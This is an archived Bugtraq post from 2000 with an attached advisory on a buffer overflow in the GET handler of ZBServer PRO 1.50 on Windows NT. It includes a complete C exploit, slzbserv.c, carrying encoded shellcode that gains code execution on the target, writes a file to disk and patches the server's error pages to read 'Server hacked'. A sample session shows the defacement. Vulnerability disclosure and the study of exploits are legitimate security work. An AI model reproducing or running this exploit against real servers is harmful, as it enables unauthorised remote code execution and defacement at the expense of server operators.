[13597] in bugtraq
ZBServer 1.50-r1x exploit (WinNT)
daemon@ATHENA.MIT.EDU (|Zan)
Fri Jan 28 14:53:15 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------893B8DFAF33940558EDF5A5B"
Message-Id: <36B0596E.8D111D66@teleline.es>
Date: Thu, 28 Jan 1999 13:34:54 +0100
Reply-To: |Zan <izan@TELELINE.ES>
From: |Zan <izan@TELELINE.ES>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------893B8DFAF33940558EDF5A5B
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
hi,
Few weeks ago USSRBACK found an buffer overflow in ZBServer (GET
command). Well, it is an exploit tested on WinNT 4.0 (spanish version).
It comes back with a raw eip in code (not jumps against "call register"
or "jmp register"). If you want a real portable exploit you can replace
last four bytes against a call edi + x where x > 10 bytes ( i left a lot
of nops waiting that jump }:)
i reverse the server too and exploit gets keep living ZBServer when
it is exploited (restore registers and kill overflowed thread) so pages
are served out normally. Exploit writes to disk an advisory file with
information for webmasters or administrators. It serves out hacked pages
too but it doesn't modifique any server page (it patchs error messages
in memory).
A real advisory is attached. Excuse my poor english.
Greets to:
Jack Barnaby AKA Dark Spyrit - http://www.beavuh.org
USSRBACK - http://www.ussrback.com
regards,
|Zan
--
|Zan / DeepZone (tm) - Digital Security Center
http://www.deepzone.org (not available yet, intranet only)
http://mareasvivas.cjb.net
--=[ ... toda la vida buscando respuestas ... y cuando por fin
las encuentas ... cambian las preguntas ]=--
--------------893B8DFAF33940558EDF5A5B
Content-Type: text/plain; charset=us-ascii;
name="zbserver.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="zbserver.txt"
Studying ZBServer 1.50-r1x overflow
Advisory Name: ZBServer crash
Advisory Released: [00/02/01]
Application: personal web, ftp and gopher servers
on Win9x, WinNT
Severity: local/remote user with WebServer
privileges can run arbitrary code.
Status: overflow discovered by USSRBACK
http://www.ussrback.com
Author: izan@galaxycorp.com
WWW: http://www.deepzone.org
http://mareasvivas.cjb.net
OVERVIEW
ZBServer PRO 1.50 (all releases) has a buffer overflow in web
server. Any local/remote user can run arbitrary code with web
server privileges. Overflow was discovered by USSRBACK few weeks
ago. The original USSRBACK post didn't contain any technical
detail. The present document is a deep study about that advisory.
It studies bug impact too.
BACKGROUND
Ideas and code were tested against Win9x and NT 4.0 sp 5 (all
spanish version). The ZBServer PRO software is 1.50. All releases
are affected (r13 to r17)
DETAILS
ZBServer PRO's WebServer has an overflow in "get command". It
can't handle a long excesive request. When the string has a lenght
about 766 bytes it crashs. The stack is overwritten.
The vulnerability exists. USSRBACK' status (bof discovers) was
originally:
"Vendor Status: i email the vendor, and i dont have a responce :("
We have exploited and finished our exploit for WinNT and it's
attached with this advisory. Arbitrary code can run with
webserver privileges.
Win9x version can't be exploitable with a clear environment. If
you have a default debugger configuration or your processes are
handled by a special process hooking errors and exceptions then
it can be exploited too but it won't be the common scenary.
Win9x version can't run arbitrary code with a clear environment
but a DoS attack is possible. You can crash the service with a
local/remote request.
EXPLOIT
ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
When you attacks a vulnerable server you can run abitrary code
inside. Firstly, sploit creates an advisory file. It's information
for administrative use. Later, exploit restores and kills
overflowed thread but before it patchs some error information so
all error pages will appear like hacked pages.
If you have problems running ZBServer they can be with your return
address (remember that tests ran against WinNT sp5 spanish version).
I could jump against edi register + 5 (more portable) but i will
have a static dll address dependence. Well, it wasn't a clear jump
so i decided to implement the first technique but the second is
possible too.
ex.
% lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page)
% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
not found.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
FILE NOT FOUND The request object (/FileNotAvailable.html) was not
found.
$ zbsploit xxx.xxx.xxx.xxx
WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
http://www.deepzone.org
Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org
done.
$ lynx http://xxx.xxx.xxx.xxx
WELCOME TO ... blah ... blah ..... (It's the root page again)
% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
Hello. You are running a ZBServer PRO's buggy version and
you have been abused.
More information can be downloaded from
http://www.deepzone.org or http://mareasvivas.cjb.net
regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)
Coded by |Zan.
% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
Server hacked.
http://www.deepzone.org Sploit coded by |Zan
%_
................................................
/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
**
** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
** When you attacks a vulnerable server you can run abitrary code
** inside. Firstly, sploit creates an advisory file. It's information
** for administrative use. Later, exploit restores and kills
** overflowed thread but before it patchs some error information so
** all error pages will appear like hacked pages.
**
** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c
** run: ./slzbserv hostname
**
** http://mareasvivas.cjb.net / http://www.deepzone.org
**
** Coded by |Zan | izan@galaxycorp.com
**
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define _PORT 80
#define _TamBuf 770
char crash[] =
"GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
int sock;
struct sockaddr_in sock_a;
struct hostent *host;
int main (int argc, char *argv[]) {
printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
printf("Coded by -=[ |Zan ]=- izan@galaxycorp.com - izan@deepzone.org\n\n");
if(argc < 2) {
fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
exit(0);
}
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(_PORT);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}
fflush(stdout);
write(sock,crash,_TamBuf);
write(sock,"\n\n", 2);
printf("done.\n\n");
}
--------------893B8DFAF33940558EDF5A5B--
